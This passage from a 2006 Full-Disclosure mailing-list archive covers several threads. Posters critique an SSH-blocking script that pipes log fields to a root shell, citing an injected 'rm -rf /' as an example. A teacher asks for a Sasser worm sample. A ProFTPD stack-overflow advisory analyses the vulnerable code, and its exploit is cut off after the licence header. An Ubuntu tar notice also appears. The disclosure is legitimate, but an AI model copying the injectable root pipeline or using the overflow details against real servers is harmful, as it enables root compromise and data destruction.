Linux int-mrkt 2.6.18-1.2200.fc5 #1 Sat Oct 14 16:59:26 EDT 2006 i686
i686 i386 GNU/Linux
[EMAIL PROTECTED] include]# awk '/error retrieving/{getline;print $13}'
/var/log/secure|sort -ru
222.171.20.252
211.137.74.58
My logs parse out addresses not named and there is no redirection going
on. If you want to say Hey... It should be written as such then gladly
do so.
You are dealing with output you can't trust there. $13 could be
anything, including \n`rm -rf /`. Later on, you pass $13,
unstripped of newlines, backticks, or any number of other special
character to a shell running as uid 0. That shell will proceed to
execute whatever we would like it to, where we are the remote
attacker who doesn't even have an account.
I don't believe the suggestion was ever that you had malicious
intent, but rather that you have very horrible coding security
habits.
I'm disinclined to sort out which of your machines I can get root on
right now because you are running this script, but I would expect
that someone reading this mailing list is already on the way and
would strongly advise that you disable those cron jobs.
--
gabriel rosenkoetter
[EMAIL PROTECTED]
pgpnRZzA4hpPU.pgp
Description: PGP signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSH brute force blocking tool
Tavis Ormandy wrote:
On Mon, Nov 27, 2006 at 04:21:19PM -0500, gabriel rosenkoetter wrote:
Mea culpa. Tavis's exploit doesn't so scary things, although he's
right you should really be doing a bit more sanitization of (evil)
user-supplied input, given that you're (insisting that you) run as
root.
Gabriel, I was referring to this line:
awk '!/#/ /\./ !a[$0]++
{print iptables -A INPUT -s $1 -i eth0 -d '$ifaddr' -p TCP --dport 22
-j REJECT}' /etc/hosts.deny |\
awk '/iptables/ !/#/ !/-s -i/'|sh
(note the |sh), $1 can be controlled by specially crafted attempted
logins.
Thanks, Tavis.
That specially crafted attempt would be a HUGE raping of TCP/IP. How do
you supposed it would be possible for someone to insert 0wn3ed or any
other variable outside of an IP address?
--
J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net
The happiness of society is the end of government.
John Adams
smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSH brute force blocking tool
That specially crafted attempt would be a HUGE raping of TCP/IP. How do
you supposed it would be possible for someone to insert 0wn3ed or any
other variable outside of an IP address?
Remember the (in)famous quote ...that vulnerability is purely
theoretical...?
I think the point is you don't use $language to split a bunch of fields,
and then pipe them back through /bin/sh without making sure they're not
malicious.
Doesn't matter that you can't think of a way to make them malicious ..
somebody else will find one. It's safer to just assume it'll happen and
always sanitize variables before you {do_stuff;} with them.
(my $0.02)
~Mike.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSH brute force blocking tool
gabriel rosenkoetter wrote:
You are dealing with output you can't trust there. $13 could be
anything, including \n`rm -rf /`. Later on, you pass $13,
unstripped of newlines, backticks, or any number of other special
character to a shell running as uid 0. That shell will proceed to
execute whatever we would like it to, where we are the remote
attacker who doesn't even have an account.
No it can't. Even if it was rm -rf someone placed in, did you not notice
my grep statement? Only print items with a decimal. At no given point
anywhere on the 13th column whether its Solaris, NetBSD, FreeBSD, would
there be an option for someone to craft anything...
FreeBSD
-bash2-2.05b$ uname -a
FreeBSD ethos.disgraced.org 5.4-RELEASE-p14 FreeBSD 5.4-RELEASE-p14 #1:
Thu May 11 01:34:54 CDT 2006
[EMAIL PROTECTED]:/usr/obj/usr/src/sys/ETHOS i386
-bash2-2.05b$ sudo awk '{print $13}' /var/log/auth.log|sort -ru
57354
57340
57335
56253
55125
49211
40334
37188
3508
33875
33635
33454
32798
3137
2895
2638
2408
2301
2114
-
OpenBSD
# uname -a
OpenBSD hades.disgraced.org 4.0 GENERIC#1 i386
# awk '{print $13}' /var/log/authlog|grep \.|sort -ru
63.243.158.221
61.129.85.230
220.132.113.163
219.149.211.49
213.195.75.41
206.210.96.56
I don't believe the suggestion was ever that you had malicious
intent, but rather that you have very horrible coding security
habits.
This should have been stated to the list as opposed to You're
backdooring people
I'm disinclined to sort out which of your machines I can get root on
right now because you are running this script, but I would expect
that someone reading this mailing list is already on the way and
would strongly advise that you disable those cron jobs.
I'll give you addresses if you'd like to take a shot at it.
--
J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net
The happiness of society is the end of government.
John Adams
smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSH brute force blocking tool
gabriel rosenkoetter wrote: On Mon, Nov 27, 2006 at 04:41:43PM -0500, J. Oquendo wrote: That specially crafted attempt would be a HUGE raping of TCP/IP. How do you supposed it would be possible for someone to insert 0wn3ed or any other variable outside of an IP address? That's impossible. Putting extra spaces in the log entry is easy. And extra spaces would do what... If the point is to insert a name someone in order to send out information from the 13th column in authlog, then I'll tell you what, you name the system it can happen on and I will personally apologize publicly. It is not doable. I'd have a better chance of hanging with Santa while I bang Angelina Jolie while Denise Richards watches me. -- J. Oquendo http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743 sil . infiltrated @ net http://www.infiltrated.net The happiness of society is the end of government. John Adams smime.p7s Description: S/MIME Cryptographic Signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSH brute force blocking tool
Michael Holstein wrote:
That specially crafted attempt would be a HUGE raping of TCP/IP. How do
you supposed it would be possible for someone to insert 0wn3ed or any
other variable outside of an IP address?
Remember the (in)famous quote ...that vulnerability is purely
theoretical...?
I think the point is you don't use $language to split a bunch of fields,
and then pipe them back through /bin/sh without making sure they're not
malicious.
Doesn't matter that you can't think of a way to make them malicious ..
somebody else will find one. It's safer to just assume it'll happen and
always sanitize variables before you {do_stuff;} with them.
(my $0.02)
~Mike.
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
So I ask you too... Find me any Unix derivative that will allow someone
to pass a name, word, place, etc into the 13th column of authlog, then
bypass grep which is grep'ing out for decimals.
--
J. Oquendo
http://pgp.mit.edu:11371/pks/lookup?op=getsearch=0x1383A743
sil . infiltrated @ net http://www.infiltrated.net
The happiness of society is the end of government.
John Adams
smime.p7s
Description: S/MIME Cryptographic Signature
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSH brute force blocking tool
On 27.Nov.2006 04:39PM -0500, Michael Holstein wrote: why not save all that trouble and just use the --limit directive in iptables? (examples on the netfilter mailing-list). or use denyhosts (denyhosts.sf.net) --josh Joshua D. Abraham Northeastern University College of Computer and Information Science www.ccs.neu.edu/home/jabra ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] SSH brute force blocking tool
On Mon, Nov 27, 2006 at 04:55:46PM -0500, J. Oquendo wrote: No it can't. Even if it was rm -rf someone placed in, did you not notice my grep statement? Only print items with a decimal. At no given point anywhere on the 13th column whether its Solaris, NetBSD, FreeBSD, would there be an option for someone to craft anything... J, I realise this is a difficult issue to grasp, but stick with it. Let's say that a ficticious log entry looks like this: DATE ERROR USERNAME ADDRESS PORT And let's say you're trying to print column 4 to get the address. Here's an example: Monday INVALID foobar 123.123.123.123 1024 You print $4 and get 123.123.123.123, excellent. Now lets try logging in as foo bar. Monday INVALID foo bar 123.123.123.123 1024 Whats in $4 now? That's right, attacker controlled data. I'll give you addresses if you'd like to take a shot at it. Sure, send them to the list, there are bound to be some takers. Thanks, Tavis. -- - [EMAIL PROTECTED] | finger me for my pgp key. --- pgpONwcIhJ92Q.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Potentially OT: AJAX article
Dear all, Please forgive the potentially off topic post, but please find below a link to a recent article concerning AJAX security I composed for Heise UK / c't, in the sincere hopes that it proves useful to anyone still even remotely interested in much hyped Web 2.0 technologies (or DHTML...) Many thanks. Michael Kemp (clappymonkey) Ajax Security: Stronger than Dirt? A look at the security implications of Ajax Ajax allows the development of more feature rich, asynchronous applications, but in doing so opens up new possibilities for attackers. We look at the relevant security issues and their possible solutions. http://www.heise-security.co.uk/articles/81264 ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Sasser or other nasty worm needed
Well if it's an air gapped network then there's no way to get patches unless you carry them over on a disk. When I taught a class at a local university we did a similar experiment on an unpatched air gapped network. On 11/27/06, K F (lists) [EMAIL PROTECTED] wrote: a douchebag? I dunno but why the hell aren't your boxes patched to Sasser yet? -KF deep fried wrote: What am I Consultant? School Teacher? Terrorist? On 11/27/06, *K F (lists)* [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote: Dude... settle the hell down. I see little problem with this guy doing this on a closed LAN in a lab setting. What part of CLOSED LAB did you miss? Its not like he is intentionally letting it loose on the entire school LAN. -KF [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] wrote: Chris - I don't know what to make of your please reply off-list; I'm not a member comment. It's almost as ridiculous as what you are requesting. If I take your question at face value, you are an INSTRUCTOR, not an Admin. That means you probably teach an A+ class, maybe an abbreviated CCNA program. You have NO FUCKING BUSINESS WHATSOEVER even THINKING about turning loose a dangerous piece of Malware in someone else's network. And it IS someone else's network; specifically it belongs to the district. Speak as a network engineer for a large midwestern schooldistrict, if you did that in MY network, I'd have your job. GOD HELP YOU if it turns out that you actually ARE a teacher in my district. I don't recognize the name, but you can bet your ass that every time we have an infection in one of our schools from now until the stars burn out; that I'll be making a point of asking who the computer teachers are in that building. You want to teach these kids a lesson? Write it on the blackboard. We have enough work to do just keeping up with the kids, without an alleged professional turning loose a worm in our network. = I'm a high school network administration teacher looking for a creative means of teaching my students the importance of patch management. I was hoping to let a particularly nasty worm loose on a closed lab so my students could see what happens during an outbreak, but I'm running into a hitch - I can't find a worm that would spread quickly enough to be useful. Does anyone have a copy of Sasser or a similar worm that they would be willing to send or link me to? Please contact me off-list. I would be happy to verify my identity as a high school teacher off-list as I'm sure that is a concern for most anyone who has what I am looking for. Please do not reply on list as I am not currently a member. Thank you, Chris mail2web - Check your email from the web at http://mail2web.com/ . ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Sasser or other nasty worm needed
On Mon, 27 Nov 2006 13:31:04 CST, Octal said: Well if it's an air gapped network then there's no way to get patches unless you carry them over on a disk. When I taught a class at a local university we did a similar experiment on an unpatched air gapped network. I've seen this done lots of times. Amazing how often people forget to wipe the disks after delivering the patches... ;) pgpAOxm0JTNZc.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ProFTPD 1.3.0 remote stack overflow
Hi all,
Our ProFTPD advisory is below.
Name: ProFTPD remote buffer overflow vulnerability
Vendor: http://www.proftpd.org
Release date: 27 Nov, 2006
URL: http://www.gleg.net/proftpd.txt
CVE: CVE-2006-5815
Author: Evgeny Legerov [EMAIL PROTECTED]
I. DESCRIPTION
A remotely exploitable stack overflow vulnerability has been found in ProFTPD
server.
The vulnerability allows a remote authenticated attacker to gain root
privileges.
II. DETAILS
The vulnerability exists in sreplace() function from src/support.c
Oversimplified analysis of the vulnerability is below:
char *sreplace(pool *p, char *s, ...) {
va_list args;
char *m,*r,*src = s,*cp;
char **mptr,**rptr;
char *marr[33],*rarr[33];
char buf[PR_TUNABLE_PATH_MAX] = {'\0'}, *pbuf = NULL;
size_t mlen = 0, rlen = 0, blen;
int dyn = TRUE;
cp = buf;
*cp = '\0';
memset(marr, '\0', sizeof(marr));
memset(rarr, '\0', sizeof(rarr));
blen = strlen(src) + 1;
va_start(args, s);
while ((m = va_arg(args, char *)) != NULL mlen sizeof(marr)-1) {
char *tmp = NULL;
size_t count = 0;
if ((r = va_arg(args, char *)) == NULL)
break;
/* Increase the length of the needed buffer by the difference between
* the given match and replacement strings, multiplied by the number
* of times the match string occurs in the source string.
*/
tmp = strstr(s, m);
while (tmp) {
pr_signals_handle();
count++;
/* Be sure to increment the pointer returned by strstr(3), to
* advance past the beginning of the substring for which we are
* looking. Otherwise, we just loop endlessly, seeing the same
* value for tmp over and over.
*/
tmp += strlen(m);
tmp = strstr(tmp, m);
}
/* We are only concerned about match/replacement strings that actually
* occur in the given string.
*/
if (count) {
blen += count * (strlen(r) - strlen(m));
marr[mlen] = m;
rarr[mlen++] = r;
}
}
va_end(args);
/* Try to handle large buffer situations (i.e. escaping of
* PR_TUNABLE_PATH_MAX
* (2048) correctly, but do not allow very big buffer sizes, that may
* be dangerous (BUFSIZ may be defined in stdio.h) in some library
* functions.
*/
#ifndef BUFSIZ
# define BUFSIZ 8192
#endif
if (blen BUFSIZ)
[1] cp = pbuf = (char *) pcalloc(p, ++blen);
if (!pbuf) {
[2] cp = pbuf = buf;
dyn = FALSE;
blen = sizeof(buf);
}
while (*src) {
for (mptr = marr, rptr = rarr; *mptr; mptr++, rptr++) {
mlen = strlen(*mptr);
rlen = strlen(*rptr);
if (strncmp(src, *mptr, mlen) == 0) {
[3] sstrncpy(cp, *rptr, blen - strlen(pbuf));
if (((cp + rlen) - pbuf + 1) blen) {
pr_log_pri(PR_LOG_ERR,
WARNING: attempt to overflow internal ProFTPD buffers);
cp = pbuf + blen - 1;
goto done;
} else {
cp += rlen;
}
src += mlen;
break;
}
}
if (!*mptr) {
[4]if ((cp - pbuf + 1) blen) {
pr_log_pri(PR_LOG_ERR,
WARNING: attempt to overflow internal ProFTPD buffers);
cp = pbuf + blen - 1;
}
*cp++ = *src++;
}
}
done:
*cp = '\0';
if (dyn)
return pbuf;
return pstrdup(p, buf);
}
First of all, the value of 'blen' is controlled by us, if we set it to a
value which less than BUFSIZ (see [1]) - we can trigger heap overflow,
otherwise
we will be able to trigger stack overflow (see [2]).
Because of miscalculation on line [4], we can overwrite last (NULL) byte of
'pbuf' - so that 'strlen(pbuf)' will be greater than 'blen'.
The code on line [3] will overwrite the 'pbuf' buffer with our data because
the 'sstrncpy' function works just nice when the third argument is negative.
At least two vectors are exist for this vulnerability:
1. MKD command
2. pr_display_file
The included trivial proof of concept exploit code uses the second attack
vector.
Write access is necessary for this exploit to work.
III. VENDOR RESPONSE
The vendor has released 1.3.0a version which addresses this issue.
For more info about the newest version of ProFTPD and possible workarounds
please visit:
http://www.proftpd.org
http://bugs.proftpd.org/show_bug.cgi?id=2858
IV. CREDIT
The vulnerability has been discovered by Evgeny Legerov.
V. EXPLOIT
# vd_proftpd.pm - Metasploit module for ProFTPD stack overflow
#
# Copyright (c) 2006 Evgeny Legerov
#
# Permission to use, copy, modify, and distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED AS IS AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
#
Re: [Full-disclosure] Sasser or other nasty worm needed
On Mon, 27 Nov 2006 17:16:31 EST, Rick said: On Mon, 27 Nov 2006, [EMAIL PROTECTED] wrote: You would have us believe that the guy is clued enough to run a closed lab without screwing up (and there's *lots* of ways to screw up, starting with forgetting to wipe the drives afterwards, forgetting to disable a wireless card, forgetting to not plug any of the boxes into the normal net, forgetting to...). so when you go to mcdonalds and hand over your $5 for your MCbig meal, do you consider the repercussions of supporting an industry which pays low wages, is under-staffed, and promotes world-hunger by using enough grain to feed a continent, etc...? WTF does that have to do with the topic? Unless you want to make the point that often, the McDonald's staff fails to use a level of food-preparation hygiene that matches the computer-security hygiene requirements to work with known malware? The average McDonald's doesn't have biohazard signs (whether they should is a different rant) - and even the average doctor's office that *does* have biohazard signs for used hypodermic needles and the like usually has special training/procedures for dealing with the stuff. And labs that do active research on biohazards have even stricter protocols. (Make note, there *have* been screw-ups in the protocols at places that handle stuff like Ebola and smallpox - Preston's The Hot Zone has a nice story of a dead monkey with nothing but a plastic garbage bag keeping the nasties in, and a few years ago, there was a small to-do in one of the labs in England that had some smallpox...) And yet he's not clued enough to know how to find a copy of Sasser by himself. so what? do *you* know where to find a copy? Yes. did you always? Yes. have you always been able to configure a network to talk via EIGRP? No, because when I first got on the net, RFC1058 was still 4 years in the future. So it wasn't always possible, because the option didn't always exist. There are a lot of people who are of the opinion that if you have to ask where to find a copy of Sasser, you're not clued enough to be trusted with a copy. perhaps the next time you need a doctor, the one you find will laugh at you with the same sense of elitism you demonstrate. Did I say I was one of the lot of people? Did you notice that I was replying *in the context of KF's comments* saying It's cool because it's in a closed lab? pgpcvyXkmDcml.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Sasser or other nasty worm needed
On Mon, 27 Nov 2006, [EMAIL PROTECTED] wrote: You would have us believe that the guy is clued enough to run a closed lab without screwing up (and there's *lots* of ways to screw up, starting with forgetting to wipe the drives afterwards, forgetting to disable a wireless card, forgetting to not plug any of the boxes into the normal net, forgetting to...). so when you go to mcdonalds and hand over your $5 for your MCbig meal, do you consider the repercussions of supporting an industry which pays low wages, is under-staffed, and promotes world-hunger by using enough grain to feed a continent, etc...? And yet he's not clued enough to know how to find a copy of Sasser by himself. so what? do *you* know where to find a copy? did you always? have you always been able to configure a network to talk via EIGRP? There are a lot of people who are of the opinion that if you have to ask where to find a copy of Sasser, you're not clued enough to be trusted with a copy. perhaps the next time you need a doctor, the one you find will laugh at you with the same sense of elitism you demonstrate. Rick ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] ProFTPD remote buffer overflow vulnerability
Hi all,
Name: ProFTPD remote buffer overflow vulnerability
Vendor: http://www.proftpd.org
Release date: 27 Nov, 2006
URL: http://www.gleg.net/proftpd.txt
CVE: CVE-2006-5815
Author: Evgeny Legerov [EMAIL PROTECTED]
I. DESCRIPTION
A remotely exploitable stack overflow vulnerability has been found in ProFTPD
server.
The vulnerability allows a remote authenticated attacker to gain root
privileges.
II. DETAILS
The vulnerability exists in sreplace() function from src/support.c
Oversimplified analysis of the vulnerability is below:
char *sreplace(pool *p, char *s, ...) {
va_list args;
char *m,*r,*src = s,*cp;
char **mptr,**rptr;
char *marr[33],*rarr[33];
char buf[PR_TUNABLE_PATH_MAX] = {'\0'}, *pbuf = NULL;
size_t mlen = 0, rlen = 0, blen;
int dyn = TRUE;
cp = buf;
*cp = '\0';
memset(marr, '\0', sizeof(marr));
memset(rarr, '\0', sizeof(rarr));
blen = strlen(src) + 1;
va_start(args, s);
while ((m = va_arg(args, char *)) != NULL mlen sizeof(marr)-1) {
char *tmp = NULL;
size_t count = 0;
if ((r = va_arg(args, char *)) == NULL)
break;
/* Increase the length of the needed buffer by the difference between
* the given match and replacement strings, multiplied by the number
* of times the match string occurs in the source string.
*/
tmp = strstr(s, m);
while (tmp) {
pr_signals_handle();
count++;
/* Be sure to increment the pointer returned by strstr(3), to
* advance past the beginning of the substring for which we are
* looking. Otherwise, we just loop endlessly, seeing the same
* value for tmp over and over.
*/
tmp += strlen(m);
tmp = strstr(tmp, m);
}
/* We are only concerned about match/replacement strings that actually
* occur in the given string.
*/
if (count) {
blen += count * (strlen(r) - strlen(m));
marr[mlen] = m;
rarr[mlen++] = r;
}
}
va_end(args);
/* Try to handle large buffer situations (i.e. escaping of
* PR_TUNABLE_PATH_MAX
* (2048) correctly, but do not allow very big buffer sizes, that may
* be dangerous (BUFSIZ may be defined in stdio.h) in some library
* functions.
*/
#ifndef BUFSIZ
# define BUFSIZ 8192
#endif
if (blen BUFSIZ)
[1] cp = pbuf = (char *) pcalloc(p, ++blen);
if (!pbuf) {
[2] cp = pbuf = buf;
dyn = FALSE;
blen = sizeof(buf);
}
while (*src) {
for (mptr = marr, rptr = rarr; *mptr; mptr++, rptr++) {
mlen = strlen(*mptr);
rlen = strlen(*rptr);
if (strncmp(src, *mptr, mlen) == 0) {
[3] sstrncpy(cp, *rptr, blen - strlen(pbuf));
if (((cp + rlen) - pbuf + 1) blen) {
pr_log_pri(PR_LOG_ERR,
WARNING: attempt to overflow internal ProFTPD buffers);
cp = pbuf + blen - 1;
goto done;
} else {
cp += rlen;
}
src += mlen;
break;
}
}
if (!*mptr) {
[4]if ((cp - pbuf + 1) blen) {
pr_log_pri(PR_LOG_ERR,
WARNING: attempt to overflow internal ProFTPD buffers);
cp = pbuf + blen - 1;
}
*cp++ = *src++;
}
}
done:
*cp = '\0';
if (dyn)
return pbuf;
return pstrdup(p, buf);
}
First of all, the value of 'blen' is controlled by us, if we set it to a
value which less than BUFSIZ (see [1]) - we can trigger heap overflow,
otherwise
we will be able to trigger stack overflow (see [2]).
Because of miscalculation on line [4], we can overwrite last (NULL) byte of
'pbuf' - so that 'strlen(pbuf)' will be greater than 'blen'.
The code on line [3] will overwrite the 'pbuf' buffer with our data because
the 'sstrncpy' function works just nice when the third argument is negative.
At least two vectors are exist for this vulnerability:
1. MKD command
2. pr_display_file
The included proof of concept exploit code uses the second attack vector.
Write access is necessary for this exploit to work.
III. VENDOR RESPONSE
The vendor has released 1.3.0a version which addresses this issue.
For more info about the newest version of ProFTPD and possible workarounds
please visit:
http://www.proftpd.org
http://bugs.proftpd.org/show_bug.cgi?id=2858
IV. CREDIT
The vulnerability has been discovered by Evgeny Legerov.
V. EXPLOIT
# vd_proftpd.pm - Metasploit module for ProFTPD stack overflow
#
# Copyright (c) 2006 Evgeny Legerov
#
# Permission to use, copy, modify, and distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED AS IS AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR
[Full-disclosure] [USN-385-1] tar vulnerability
=== Ubuntu Security Notice USN-385-1 November 27, 2006 tar vulnerability CVE-2006-6097 === A security issue affects the following Ubuntu releases: Ubuntu 5.10 Ubuntu 6.06 LTS Ubuntu 6.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 5.10: tar 1.15.1-2ubuntu0.2 Ubuntu 6.06 LTS: tar 1.15.1-2ubuntu2.1 Ubuntu 6.10: tar 1.15.91-2ubuntu0.3 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: Teemu Salmela discovered that tar still handled the deprecated GNUTYPE_NAMES record type. This record type could be used to create symlinks that would be followed while unpacking a tar archive. If a user or an automated system were tricked into unpacking a specially crafted tar file, arbitrary files could be overwritten with user privileges. Updated packages for Ubuntu 5.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.15.1-2ubuntu0.2.diff.gz Size/MD5:29654 155f4628f9fef19aa20e3927a857fd0d http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.15.1-2ubuntu0.2.dsc Size/MD5: 574 22006def60be25510613a955ca7e90d2 http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.15.1.orig.tar.gz Size/MD5: 2204322 d87021366fe6488e9dc398fcdcb6ed7d amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.15.1-2ubuntu0.2_amd64.deb Size/MD5: 531932 d507bfc76276c9cc43ebf56f9d69038a i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.15.1-2ubuntu0.2_i386.deb Size/MD5: 519858 ed19ee38f074d841366737e880a5c626 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.15.1-2ubuntu0.2_powerpc.deb Size/MD5: 533886 5d0d477d0bbe5589f5a3181144099c92 sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.15.1-2ubuntu0.2_sparc.deb Size/MD5: 525056 1fa9aa25fbbc81c4fcf767c28b4eb991 Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.15.1-2ubuntu2.1.diff.gz Size/MD5:30078 32b5ca833a90aa5bcbc3941a07dbf81a http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.15.1-2ubuntu2.1.dsc Size/MD5: 574 c68c40e5d79b9afd13626694b0bcb2d4 http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.15.1.orig.tar.gz Size/MD5: 2204322 d87021366fe6488e9dc398fcdcb6ed7d amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.15.1-2ubuntu2.1_amd64.deb Size/MD5: 532022 ddcb1e2e8770645f683b462b095ff851 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.15.1-2ubuntu2.1_i386.deb Size/MD5: 519384 be7fa1ac67587e1ef574ed457e967454 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.15.1-2ubuntu2.1_powerpc.deb Size/MD5: 533876 4b9404feef3aaaf23cf28abd1432517b sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.15.1-2ubuntu2.1_sparc.deb Size/MD5: 523654 1164fe3b20e4f530df21258907f3cd9d Updated packages for Ubuntu 6.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.15.91-2ubuntu0.3.diff.gz Size/MD5:16849 1776a8a649f3fec68c6990accd5f47c8 http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.15.91-2ubuntu0.3.dsc Size/MD5: 596 58f9bea1622976afa48a7eb61e8945e8 http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.15.91.orig.tar.gz Size/MD5: 2016367 e2338a16b0464ec03826e000dae990a0 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.15.91-2ubuntu0.3_amd64.deb Size/MD5: 361636 9580b1e23dc58caf6af9543dbe045dca i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.15.91-2ubuntu0.3_i386.deb Size/MD5: 346396 4bb2868d5fc2855a8242c6c89c7afb12 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.15.91-2ubuntu0.3_powerpc.deb Size/MD5: 365486 79ddf1293d8e759fd96fee0c612d6000 sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/t/tar/tar_1.15.91-2ubuntu0.3_sparc.deb Size/MD5: 348136 ffdb48742e8bc415682f18d6c74f70c2 signature.asc Description: Digital
Re: [Full-disclosure] Sasser or other nasty worm needed
I doubt schools have CLOSED LAB. I would like to know where the budget comes from, for this type of network. If so , then every school district board needs one.. :)- On 11/27/06, K F (lists) [EMAIL PROTECTED] wrote: Dude... settle the hell down. I see little problem with this guy doing this on a closed LAN in a lab setting. What part of CLOSED LAB did you miss? Its not like he is intentionally letting it loose on the entire school LAN. -KF [EMAIL PROTECTED] wrote: Chris - I don't know what to make of your please reply off-list; I'm not a member comment. It's almost as ridiculous as what you are requesting. If I take your question at face value, you are an INSTRUCTOR, not an Admin. That means you probably teach an A+ class, maybe an abbreviated CCNA program. You have NO FUCKING BUSINESS WHATSOEVER even THINKING about turning loose a dangerous piece of Malware in someone else's network. And it IS someone else's network; specifically it belongs to the district. Speak as a network engineer for a large midwestern schooldistrict, if you did that in MY network, I'd have your job. GOD HELP YOU if it turns out that you actually ARE a teacher in my district. I don't recognize the name, but you can bet your ass that every time we have an infection in one of our schools from now until the stars burn out; that I'll be making a point of asking who the computer teachers are in that building. You want to teach these kids a 